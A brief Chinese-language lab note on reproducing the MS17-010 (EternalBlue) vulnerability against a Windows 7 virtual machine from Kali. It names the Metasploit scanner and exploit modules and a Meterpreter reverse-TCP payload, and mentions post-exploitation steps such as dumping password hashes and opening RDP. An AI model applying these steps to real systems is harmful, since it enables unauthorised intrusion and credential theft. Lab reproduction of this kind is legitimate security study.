MS17010复现
靶机win7:192.168.41.150
攻击kali: 192.168.41.147
扫描
通过auxiliary/scanner/smb/smb_ms17_010模块扫描虚拟机是否存在ms17010漏洞
存在
拿shell
通过exploit/windows/smb/ms17_010_eternalblue 直接exp打,设置好参数和payload,windows/x64/meterpreter/reverse_tcp
直接拿到系统权限,并且没有蓝屏,接下来就是后渗透的事情了。抓哈希,开3389等